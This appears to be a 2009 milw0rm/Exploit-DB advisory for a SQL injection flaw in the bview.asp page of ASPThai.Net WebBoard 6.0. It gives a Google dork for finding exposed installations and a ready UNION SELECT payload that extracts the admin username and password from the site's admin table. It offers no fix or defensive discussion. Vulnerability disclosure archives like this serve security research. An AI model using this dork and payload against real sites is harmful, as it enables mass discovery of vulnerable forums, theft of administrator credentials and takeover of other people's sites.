ASPThai.Net WebBoard 6.0 - SQL Injection

EDB-ID:

7635

Author:

DaiMon

Type:

webapps

Platform:

PHP

Published:

2009-01-01

ASPThai.Net Webboard 6.0(bview.asp) SQL Injection Vulnerability
#############################################
>>Autore: DaiMon
>>Email: cwdaimon[1]gmail.com
>>Site: http://www.cwdaimon.com
>>Version: 6.0
>>Download: http://www.aspthai.net/detailcode.asp?Mode=Load&DID=7&Redirect=QUHG/UKCD/RREP/VZssGGYUkedWebLtksjudROM
##############################################
>>>>
Bug In \bview.asp
>>>>
Google Dork:
allinurl:bview.asp?id=
>>>>
Exploit:
 
bview.asp?id=1+union+select+0,useradmin,2,3,4,passadmin,6,7,8+from+admin
##############################################
Special:PARS! & Equilibrium & KaYZeRSoZe & ALL Cyber-Warrior

# milw0rm.com [2009-01-01]